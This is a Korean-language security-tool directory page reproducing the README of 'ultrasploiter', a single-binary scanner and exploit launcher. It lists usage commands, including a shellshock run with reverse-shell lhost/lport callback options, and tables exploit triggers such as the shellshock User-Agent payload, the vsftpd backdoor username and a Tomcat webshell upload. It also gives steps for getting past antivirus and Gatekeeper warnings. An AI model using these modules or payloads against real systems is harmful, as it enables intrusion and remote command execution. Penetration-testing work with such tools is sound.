Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
ultrasploiter — 포트 스캐너, 전체 Exploit-DB 인덱스(47k 항목) 및 실행 가능한 익스플로잇 모듈을 하나의 도구로 통합한 단일 바이너리. Rust로 작성되었으며 Linux, Windows 및 macOS에서 실행됩니다. | Kitploit
도구/GitLabGitLab/vqkro/ultrasploiter
Penetration Testing FrameworksReconnaissanceVulnerability ScannersExploit FrameworksNetwork MappingPort ScanningExploitationWeb Application ExploitationInformation GatheringCommand and ControlRed Teaming
1013시간 8분 전아직 검토되지 않음
Payload Development
GitLabvqkro/ultrasploiter

ultrasploiter

포트 스캐너, 전체 Exploit-DB 인덱스(47k 항목) 및 실행 가능한 익스플로잇 모듈을 하나의 도구로 통합한 단일 바이너리. Rust로 작성되었으며 Linux, Windows 및 macOS에서 실행됩니다.

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

UltraSploiter

스캔, 매칭, 익스플로잇 — IP 하나 넣으면 셸이 나온다.

포트 스캐너, 전체 Exploit-DB 인덱스, 그리고 실행 가능한 익스플로잇 모듈 모음을 하나의 도구로 합친 단일 바이너리. Linux, Windows, macOS에서 실행된다.

작업일반적으로여기서는
호스트의 서비스 찾기nmapUltraSploiter scan <ip>
익스플로잇 조회searchsploitUltraSploiter search <kw>
익스플로잇 실행msfconsoleUltraSploiter exploit <ip> <module>

UltraSploiter menu


설치

가장 간단하고 좋은 방법은 미리 빌드된 바이너리를 받아서 실행하는 것이다. 설치할 것도, 의존성도 없다 — 자체 완결형 파일 하나뿐이다.

Releases 페이지에서 다운로드:

  • Windows — UltraSploiter-windows-x86_64.exe → 더블클릭
  • Linux — UltraSploiter-linux-x86_64
  • macOS — 아직 미리 빌드된 바이너리 없음; 아래 명령 하나로 빌드

주의: 보안 도구는 플래그가 붙는다. Windows SmartScreen과 백신이 바이너리에 대해 경고하거나 격리할 가능성이 높다 — 추가 정보 → 실행을 클릭하거나, 계속 사용할 거라면 예외로 추가하라.

Windows

UltraSploiter.exe를 더블클릭한다. 메뉴가 열린다.

SmartScreen이 알 수 없는 게시자에 대해 경고하면(서명되지 않은 바이너리라면 반드시 그럴 것이다), 추가 정보 → 실행을 클릭한다.

Linux

chmod +x UltraSploiter-linux-x86_64
./UltraSploiter-linux-x86_64

macOS

chmod +x UltraSploiter-macos-arm64
./UltraSploiter-macos-arm64

Gatekeeper가 차단하면(역시 서명되지 않은 바이너리라면), 우클릭 → 열기를 하거나, 격리 플래그를 한 번 제거한다:

xattr -d com.apple.quarantine UltraSploiter-macos-arm64

소스에서 빌드

플랫폼용 바이너리가 없거나 수정하고 싶을 때만 필요하다. Rust 1.74+가 필요하다.

Linux

sudo apt install build-essential    # gcc + linker (Debian/Ubuntu)
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

macOS

xcode-select --install              # clang + linker
git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
./build.sh                          # -> ./UltraSploiter

Windows

git clone https://gitlab.com/vqkro/ultrasploiter
cd ultrasploiter
.\build.ps1                         # -> UltraSploiter.exe

build.ps1은 stable-x86_64-pc-windows-gnu 툴체인을 사용하며, 이는 MinGW로 링크한다 — 따라서 Visual Studio나 MSVC가 필요 없다. 툴체인이 없으면 설치한다. 이미 MSVC Build Tools가 있다면 그냥 cargo build --release도 작동한다.

Windows + GNU 주의: windows-sys(tokio가 끌어옴)는 dlltool을 호출하는데, 이는 어셈블러 as를 실행한다 — 그리고 rust-mingw 컴포넌트에는 as가 포함되어 있지 않다. build.ps1은 as가 있는 MinGW bin을 %~dp0tools\mingw64\bin과 %USERPROFILE%\tools\mingw64\bin에서 찾고, 발견하면 PATH 앞에 추가한다. error calling dlltool이 발생하면 winlibs 빌드를 그곳에 넣어라. MSVC 툴체인은 영향을 받지 않는다.


실행

인자 없이 실행하면 메뉴가 나온다:

   1)  Scan a target           find open ports and services
   2)  Search exploits         keyword lookup
   3)  List runnable modules
   4)  Run an exploit          pick a target and a module
   5)  Console                 advanced msf-style commands
   0)  Exit

명령줄

UltraSploiter scan 10.0.0.5                      # top 1000 ports + fingerprint + suggestions
UltraSploiter scan 10.0.0.5 -p 1-1024 -T4        # range, fast timing
UltraSploiter scan 10.0.0.5 -p -                 # all 65535 ports
UltraSploiter scan 10.0.0.5 -sU                  # UDP scan
UltraSploiter scan 10.0.0.5 --json
UltraSploiter scan 10.0.0.5 -oX out.xml
UltraSploiter search samba
UltraSploiter info 17491
UltraSploiter show 17491                          # print the PoC source for an Exploit-DB id
UltraSploiter modules
UltraSploiter msf search smb                      # bridge to Metasploit (needs it installed)
UltraSploiter exploit 10.0.0.5 vsftpd_234
UltraSploiter exploit 10.0.0.5 shellshock -o lhost=10.0.0.1 -o lport=4444
UltraSploiter console

Linux/macOS에서는 ./를 앞에 붙인다 (예: ./UltraSploiter scan 10.0.0.5).

스캔 플래그

플래그의미
-p <spec>top (1000), 80,443, 1-1024, - (전체)
-T0..-T5타이밍 템플릿 — 느림/조용함에서 빠름/시끄러움까지
-sUUDP 프로브 스캔
-sV서비스/버전 탐지 (기본 활성화)
--no-banner배너 그래빙 건너뛰기
--jsonstdout으로 JSON 출력
-oX <file>nmap 스타일 XML

스캐너는 비동기(tokio) 방식이다: 각 -T 레벨은 동시에 진행 중인 소켓 수를 설정한다 (-T5에서 최대 8000개), 따라서 nmap top-1000을 몇 초 만에 커버한다. 모든 "open"은 완료된 TCP 핸드셰이크이므로 결과는 정확하다.

옵션 (-o key=value)

키사용처의미
lhost, lportrev-shell 모듈콜백 주소
rport웹 모듈HTTP 포트 재정의
pathshellshock, struts, phpunit엔드포인트 경로
user, passtomcat_manager매니저 자격 증명
coresolr_rceSolr 코어 이름
filegrafana_lfi읽을 파일
ssh_pubkeyredis_unauthauthorized_keys에 넣을 키
src, dstproftpd_modcopy복사 원본 / 대상
timeout전체소켓 타임아웃(초)

익스플로잇 데이터베이스

search와 info는 전체 Exploit-DB 인덱스 — 47,000개 이상의 항목 (searchsploit이 사용하는 것과 동일한 데이터셋)을 기반으로 하며, 바이너리에 번들로 포함되어 있다. 항목이 실행 가능한 모듈이 구현한 CVE를 포함하면, info가 둘을 연결한다:

$ UltraSploiter info 17491
Exploit-DB 17491
  description  vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
  codes        OSVDB-73573;CVE-2011-2523

  [runnable] vsftpd_234
  UltraSploiter exploit <ip> vsftpd_234

실행 가능한 모듈 (37개)

모듈CVE트리거
vsftpd_234CVE-2011-2523:) 사용자명 → 6200 포트에 root 바인드 셸
unrealircd_backdoorCVE-2010-2075IRC를 통한 AB; <cmd>
distcc_execCVE-2004-2687DIST 프로토콜 컴파일러 인자
proftpd_modcopyCVE-2015-3306SITE CPFR/CPTO 파일 복사
redis_unauth—CONFIG SET이 키 또는 cron 항목을 기록
shellshockCVE-2014-6271User-Agent: () { :; }; <cmd>
struts2_5638CVE-2017-5638Content-Type의 OGNL
tomcat_putCVE-2017-12615JSP 웹셸을 PUT
tomcat_manager—/manager를 통해 WAR 배포
elasticsearch_groovyCVE-2015-1427_search의 Groovy RCE
drupalgeddon2CVE-2018-7600Form API 렌더 콜백
phpunit_evalCVE-2017-9841eval-stdin.php
jenkins_scriptCVE-2019-1003000인증 없는 /script Groovy
solr_rceCVE-2019-17558stream.body의 Velocity 템플릿
grafana_lfiCVE-2021-43798플러그인 경로 순회 파일 읽기
webmin_backdoorCVE-2019-15107password_change.cgi가 값을 셸로 파이프
php_cgi_arg_injectionCVE-2012-1823쿼리 문자열을 통한 -d auto_prepend_file

각 모듈은 비파괴적인 check()와 run()을 구현한다.

카탈로그 모듈 (데이터 기반)

이들은 data/catalog.json의 카탈로그 엔진이 실행하는 작은 JSON 레시피다. 모듈 추가는 새 소스 파일이 아니라 약 8줄의 데이터다:

idCVE내용
CAT-F5-TMUI-LFICVE-2020-5902F5 BIG-IP TMUI 파일 읽기
CAT-F5-ICONTROL-BASHCVE-2021-22986F5 iControl REST 인증 없는 RCE
CAT-F5-ICONTROL-2022-1388CVE-2022-1388F5 iControl 인증 우회 RCE
CAT-PULSE-SECURE-LFICVE-2019-11510Pulse Secure VPN 파일 읽기
CAT-CITRIX-2019-19781CVE-2019-19781Citrix ADC 파일 읽기
CAT-APACHE-2449 / -RCECVE-2021-41773Apache 2.4.49 순회 / mod_cgi RCE
CAT-APACHE-2450 / -RCECVE-2021-42013Apache 2.4.50 순회 / mod_cgi RCE
CAT-VBULLETIN-2019-16759CVE-2019-16759vBulletin widget_php RCE
CAT-VBULLETIN-2020-17496CVE-2020-17496vBulletin 중첩 위젯 RCE
CAT-NEXUS3-LFICVE-2024-4956Nexus Repository 3 경로 순회
CAT-FORTINET-FGTLANGCVE-2018-13379Fortinet SSL-VPN 세션 파일 읽기
CAT-PHPMYADMIN-LFICVE-2018-12613phpMyAdmin 로컬 파일 포함
CAT-MINIO-INFOCVE-2023-28432MinIO 환경 / 자격 증명 노출
CAT-SPRING-ACTUATOR-ENV—Spring Boot actuator 설정 유출
CAT-DOCKER-API—개방된 Docker Engine API
CAT-KUBELET-PODS—익명 kubelet 파드 목록
CAT-ETCD-KEYS—인증 없는 etcd 키 저장소
CAT-HADOOP-WEBHDFS—인증 없는 WebHDFS 목록

엔진은 메서드, 헤더, 본문, {cmd} / {file} / {lhost} / {lport} 치환, 경로 인식 URL 인코딩(순회를 위해 슬래시는 리터럴로 유지, 폼 본문은 완전히 인코딩, JSON은 원시 유지), 성공 마커, 리버스 셸 핸들러, 그리고 curl을 통한 HTTPS를 처리하므로 443 포트 레시피가 바이너리에 TLS 의존성 없이 작동한다.

Metasploit 브리지

이미 Metasploit이 설치되어 있다면, msf가 그것으로 전달한다:

도구 다운로드